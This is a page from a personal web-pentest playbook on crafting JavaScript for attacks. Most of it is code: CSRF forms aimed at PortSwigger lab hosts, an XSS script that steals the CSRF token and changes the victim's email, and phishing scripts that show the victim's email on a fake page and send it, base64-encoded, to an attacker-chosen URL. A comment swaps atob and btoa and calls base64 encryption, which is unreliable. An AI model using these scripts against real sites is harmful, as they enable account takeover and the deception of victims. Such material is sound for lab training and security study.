🎃
Jackmeister's Playbook
  • Welcome
  • Web Pentest
    • Mind Maps
    • Server Site Attacks
      • php type juggling
      • SSTI
      • SQL
        • PSG SQL
        • SQL Database Uses
        • SQL Injection
        • Blind SQL injection
        • SQLITE injection
      • psy shell
    • Recon
      • DNS Hunting
      • Web Tech Hunting
      • Credentials Harvesting
      • Subdomain Hunting
      • Javascript Hunting
    • Directory Brute Forcing
    • File Upload Tricks
      • PHP htaccess and ASP web.config bypass
      • PHP Exiftool edit and upload
      • PHP Extensions payloads / Cheatsheet
      • PHP disable_functions bypass
    • Client Site Attacks
      • Case Study - XSS-GPT
      • XSS
        • XSS All in one
        • XSS cookie stealing
        • Payloads / Cheatsheet
      • Javascript Crafting
      • PDF
    • CMS / Framework
      • apache / xampp
      • Django
      • Manegto
      • Joomla
      • Jenkins
      • Flask jinja2
      • tomcat
      • Drupal
      • nodejs
      • wordpress
    • Google Dorking
    • API
    • Command Injection
      • Command Injection Payloads/Cheatsheet
    • Rewrite URL
    • HTTP Request Smuggling (CL.TE)
  • Network Pentest
    • Linux
      • Internal Port Scanning
      • Privileges Escalation
      • Finding files
      • OVA2ROOT
    • Window
      • AV Evading
      • Chrome Password Extract
      • Internal Port Scanning
      • Privileges Escalation
      • ALL IN ONE
      • THM Priv Esc
      • Post Compromise
    • Port Forwarding
      • Playground Setup
    • Exploit Hunting
      • Searchsploit
    • tty-interactive-shell
    • Active Directory (AD)
      • Crackmapexec
  • Wireless Pentest
    • Airgeddon
    • Evil Twin
    • Aircrack
  • Vulnerability Assessment
    • Nmap
    • Nessus
  • General
    • Kiosk Escaping
    • Credential Bruteforcing
  • System Hardening
  • Phishing
    • Gophish
    • Mailing Server
    • SMS Server
    • DNS Server
Powered by GitBook
On this page
  • PSG CSRF 1 : No Validation
  • PSG CSRF 2 : CSRF request method validation bypass using GET request instead of POST
  • XSS to CSRF Changing email
  • CSRF placing email bot from parameter and redirecting it to another host
  • CSRF placing email obtained from parameter

Was this helpful?

  1. Web Pentest
  2. Client Site Attacks

Javascript Crafting

PSG CSRF 1 : No Validation

<form method="POST" action="https://0a3700f504731a4780bc0d2500a000f6.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="ttttt@test.com">
</form>
<script>
        document.forms[0].submit();
</script>

PSG CSRF 2 : CSRF request method validation bypass using GET request instead of POST

    <form action="https://0a3200e70330e7bb86d263eb00300092.web-security-academy.net/my-account/change-email">
      <input type="hidden" name="email" value="wqwqqqqe&#64;dwa&#46;com" />
      <input type="hidden" name="csrf" value="57wADTL15Fs0pWIwqejKzreJVbVp80fO" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>

XSS to CSRF Changing email

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=t3st@test.com')
};
</script>
  1. Go to the account page

  2. Make POST request to change email

  3. Remember supply necessary parameter (can get from burp post request)

CSRF placing email bot from parameter and redirecting it to another host

   <script>
            function onWindowLoad() {
                const urlParams = new URLSearchParams(window.location.search);
                const email = urlParams.get('email');
		const destination = urlParams.get('url');
		var xhr = new XMLHttpRequest();
    		xhr.open('GET', destination, true);
		xhr.send();
		fetch(destination);
                var outputCdc = document.getElementById("gf-user");
                outputCdc.innerText=`${email}`;
            }
            window.onload = onWindowLoad;

            function redirected() {
              const urlParams = new URLSearchParams(window.location.search);
              const destination = urlParams.get('url');
              const email = urlParams.get('email');
              const emailb = btoa(email);
              if (destination) {
                window.location.href = destination + "&key=" + emailb;
              } else {
                window.location.href = 'defaultPage.html';
              }              
            }
    </script>
  1. Obtain email and url from victim opened link url will be used as redirected host

  2. Place the value of email into the input box as placeholder (to trick victim thinking its legit website)

  3. When victim press the Proceed button , they get redirected to url + key where key is their email encrypted in base64

CSRF placing email obtained from parameter

<script>
      window.onload = function() {
        const urlParams = new URLSearchParams(window.location.search);
        const emailb = urlParams.get('key');
        const email = atob(emailb);
        const inpele2 = document.getElementById('emailkau');
        const inpele3 = document.getElementById('displayName');
        inpele2.value = email;
        inpele3.textContent = email;
      };
    </script>
  1. Must have base64 email (key) of victim (atob to encrypt and btoa to decrypt base64)

  2. Pass in the value as email place holder to trick victim

PreviousPayloads / CheatsheetNextPDF

Last updated 1 year ago

Was this helpful?